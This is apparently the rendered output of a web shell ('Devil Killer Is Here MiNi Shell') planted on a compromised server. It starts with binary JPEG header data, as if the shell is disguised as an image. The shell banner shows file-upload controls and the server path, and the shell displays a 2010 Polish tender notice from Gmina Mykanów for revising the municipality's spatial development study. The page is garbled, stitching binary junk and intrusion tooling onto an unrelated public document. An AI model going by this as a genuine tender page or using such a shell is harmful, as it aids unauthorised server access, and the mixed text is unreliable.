JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100115/12542-N-2010.html

<p class="kh_header"><b>Mykanów: Opracowanie zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego Gminy Mykanów</b><br>
<b>Numer ogłoszenia: 12542 - 2010; data zamieszczenia: 15.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Mykanów , ul. Samorządowa 1, 42-233 Mykanów, woj. śląskie, tel. 034 3288019, faks 034 3288019 w. 32.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego Gminy Mykanów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.1.	Przedmiotem zamówienia jest opracowanie zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego Gminy Mykanów.

1.2.	Zamówienie obejmuje sporządzenie na pozyskanych przez Wykonawcę we własnym zakresie podkładach mapowych w skali 1 : 10 000, projektu zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy Mykanów, zgodnie z Uchwałą Nr 227/XXII/2009 Rady Gminy Mykanów z dnia  29 kwietnia 2009r.  w sprawie przystąpienia do zmiany Studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy Mykanów. Obszar opracowania obejmuje obszar Gminy Mykanów w granicach administracyjnych. Opracowanie będzie się składało z projektu studium (część tekstowa i graficzna ), prognozy  oddziaływania na środowisko oraz opracowania ekofizjograficznego.

Dane ogólne:
Powierzchnia gminy -  141km2;
Liczba ludności - 14 241;
Ilość sołectw - 24;
Ilość miejscowości - 41.
           Gmina nie posiada gminnej ewidencji zabytków, sporządzonej zgodnie 
           z    ustawą o ochronie zabytków i opiece nad zabytkami z dnia 23 lipca 2003 r.
           (Dz.U. z 2003 r. Nr 162 poz. 1568).
           Gmina posiada program ochrony środowiska wraz z planem gospodarki
           Odpadami.
           Gmina posiada opracowaną strategię rozwoju gminy.
         Gmina posiada Ewidencję dróg gminnych.
          Gmina posiada, udostępnioną przez Wojewódzki Ośrodek Dokumentacji 
          Geodezyjnej i Kartograficznej w Katowicach,  wersję elektroniczną mapy 
          topograficznej gminy w skali  1 : 25 000.

1.3.	Zamówienie należy sporządzić zgodnie z Ustawą z dnia 27 marca 2003 r.  o planowaniu i zagospodarowaniu przestrzennym (Dz. U. Nr 80 poz. 717 z 2003 r. z póź. zm.), przepisami Rozporządzeniem Ministra Infrastruktury                   z dnia 28 kwietnia 2004 r. w sprawie zakresu projektu studium uwarunkowań                i kierunków zagospodarowania przestrzennego gminy (Dz. U. Nr 118 poz. 1233 z 2004 r.) oraz Ustawą z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. Nr 199 poz. 1227 z 2008 r. z późn. zm.), Rozporządzeniem Ministra Środowiska z dnia 9 września 2002r. w sprawie opracowań ekofizjograficznych (Dz.U. Nr 155, poz. 1298)
           Studium musi uwzględniać dotychczasowe opracowania planistyczne   
           wykonane na   rzecz Gminy Mykanów.
           Studium winno składać się z części tekstowej i graficznej; materiały winny 
           zostać przedstawione w następującej formie:
I.	 cześć tekstowa, z podziałem na:
a)	część zawierającą syntezę i analizę istniejących uwarunkowań wraz z
       wnioskami,
b)	część zawierającą ustalenia studium określające kierunki i lokalne
       zasady   zagospodarowania przestrzennego.
        II. część graficzna, z rozbiciem na plansze zawierające:
a)	aktualną inwentaryzację urbanistyczną  terenu,
b)	analizę dotychczasowego zainwestowania i przeznaczenia terenów oraz złożonych dotychczas wniosków o zmianę przeznaczenia terenów w miejscowych planach zagospodarowania przestrzennego,
c)	analizę zagadnień z zakresu uzbrojenia Gminy, ze szczególnym uwzględnieniem zagadnień gospodarki wodno-ściekowej i zaopatrzenia w energię elektryczną  i gaz, 
d)	analizę istniejącego układu komunikacyjnego wraz z uwarunkowaniami rozwoju sieci drogowej,
e)	analizę zagadnień konserwatorskich,
f)	kierunki zagospodarowania, z lokalnymi zasadami zagospodarowania
g)	obszary dla których obowiązkowe jest sporządzenie miejscowego planu zagospodarowania przestrzennego wraz z ich hierarchizacją , obszary na których rozmieszczone będą inwestycje celu publicznego o znaczeniu lokalnym oraz obszary na których rozmieszczone będą inwestycje celu publicznego o znaczeniu ponadlokalnym, zgodnie z ustaleniami planu zagospodarowania przestrzennego województwa i ustaleniami programów o których mowa w ustawie o planowaniu i zagospodarowaniu przestrzennym.

1.4.	Od projektanta oczekuje się uczestniczenia w czynnościach proceduralnych: pomoc w udzielaniu informacji zainteresowanym w trakcie wyłożenia projektu studium, uczestniczenie w dyskusji publicznej nad przyjętymi rozwiązaniami w projekcie studium, rozpatrzenie złożonych uwag do projektu studium, ewentualny udział w posiedzeniach Komisji i Rady Gminy.

1.5.	Wykonawca winien przekazać Zamawiającemu następujące prace w ilościach:
- 5 egz. rysunku studium w skali 1: 10 000, w tym 4 egz. poskładane, 1 egz.   w sekcjach, 
- 1 egz. rysunku studium, foliowany dla celów prezentacji,  pomniejszony do skali 1: 25 000,
- tekst studium - 5 egz., 
- projekt studium w formie zapisu elektronicznego - 2 płyty CD (część tekstowa i graficzna),
- prognoza oddziaływania na środowisko - 4 egz.,
- prognoza oddziaływania na środowisko w formie zapisu elektronicznego -    2 płyty CD,
- opracowanie ekofizjograficzne - 3 egz.,
- dokumentację formalno-prawną prac planistycznych składających się z materiałów określonych w § 9 Rozporządzenia Ministra  Infrastruktury z dnia 28 kwietnia 2004r. w sprawie zakresu projektu studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy (Dz. U. z 2004 r.Nr 118 poz.1233) - 2 kpl. (w tym 1 oryginał), - mapy niezbędne do opracowania studium..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.40.00.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 16.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału określone w art. 22 ust. 1 ustawy Pzp. 

1.1.	Spełnienie warunków udziału odnoszących się do posiadania niezbędnej wiedzy i doświadczenia,  dysponowania potencjałem technicznym i  osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia oraz sytuacji finansowej i ekonomicznej zostanie ocenione według poniższych zasad :
1)	udokumentowanie należytego wykonania przez Wykonawcę, w ciągu ostatnich 3 lat przed dniem wszczęciem postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej  1 zadania  dotyczącego opracowania  studium  uwarunkowań i kierunków zagospodarowania przestrzennego dla  obszaru całej gminy  lub części gminy ( wtedy obszar opracowania nie może być mniejszy niż 5 000ha ) lub opracowania 1 planu zagospodarowania przestrzennego dla obszaru całej gminy lub części gminy ( wtedy obszar opracowania nie może być mniejszy niż 5 000ha) . Ponadto w zespole projektowym powinny  być zatrudnione co najmniej dwie osoby posiadające prawo do wykonywania zawodu urbanisty na podstawie obowiązujących przepisów ,z których jedna  zostanie wyznaczona do kierowania zespołem projektowym  i będzie pełnić funkcję głównego projektanta. Główny projektant powinien posiadać w swoim dorobku wykonanie co najmniej wykonanie jednego studium uwarunkowań i kierunków zagospodarowania przestrzennego  lub jednego planu zagospodarowania przestrzennego przy opracowaniu których pełnił funkcję głównego projektanta

2.	Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty.
3.	Zamawiający wezwie w trybie art.26 ust.3 Wykonawców, którzy w określonym terminie nie złożyli oświadczeń i dokumentów potwierdzających spełnianie warunków udziału w postępowaniu lub, którzy złożyli dokumenty zawierające błędy, do ich uzupełnienia w wyznaczonym terminie chyba, że mimo ich złożenia oferta wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania,.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 - Wykonawca składa oświadczenia, których wzór stanowią Załącznik Nr 1 oraz Załącznik Nr 2 do niniejszej SIWZ.

1.	W celu potwierdzenia, że Wykonawca posiada uprawnienia do określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ust.1 ustawy :
1)	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 

2.	W celu potwierdzenia spełnienia warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania osobami zdolnymi do wykonania zamówienia:

1).	Wykaz wykonanych w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego tj. przed terminem publikacji ogłoszenia o zamówieniu., a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej  1 zadania  dotyczącego opracowania  studium  uwarunkowań i kierunków zagospodarowania przestrzennego dla  obszaru całej gminy  lub części gminy ( wtedy obszar opracowania nie może być mniejszy niż 5 000ha ) lub opracowanie 1 planu zagospodarowania przestrzennego dla obszaru całej gminy lub części gminy ( wtedy obszar opracowania nie może być mniejszy niż 5 000ha )
     z podaniem ich wartości, przedmiotu oraz daty i miejsca wykonania. Do wykazu Wykonawca zobowiązany jest dołączyć dokumenty potwierdzające, że roboty te zostały wykonane należycie (referencje, protokoły odbioru, itp.) . Wykaz należy sporządzić zgodnie ze wzorem stanowiącym Załącznik Nr 3 do niniejszej SIWZ.

2. Dokumenty potwierdzające posiadanie w zespole projektowym  co najmniej dwóch  osób posiadających  prawo do wykonywania zawodu urbanisty na podstawie obowiązujących przepisów ,z których jedna z nich będzie pełnić funkcję głównego projektanta a Główny projektant powinien posiadać w swoim dorobku wykonanie co najmniej wykonanie jednego studium uwarunkowań i kierunków zagospodarowania przestrzennego lub jednego planu zagospodarowania przestrzennego przy opracowaniu których pełnił funkcję głównego projektanta - należy załączyć wypełniony załącznik  druk nr 4 do siwz , dokumenty potwierdzające pełnienie funkcji głównego projektanta w realizacji danego zamówienia oraz zaświadczenia, wydane przez właściwą izbę samorządu zawodowego  potwierdzające wpis danej osoby na listę członków właściwej izby, lub przedstawią pisemne zobowiązanie innych podmiotów o udostępnieniu osób posiadających wskazane uprawnienia.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.mykanow.4bip.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Mykanowie
42-233 Mykanów
ul. Samorządowa 1.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.01.2010 godzina 11:00, miejsce: Urząd Gminy w Mykanowie
42-233 Mykanów 
ul. Samorządowa 1
sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com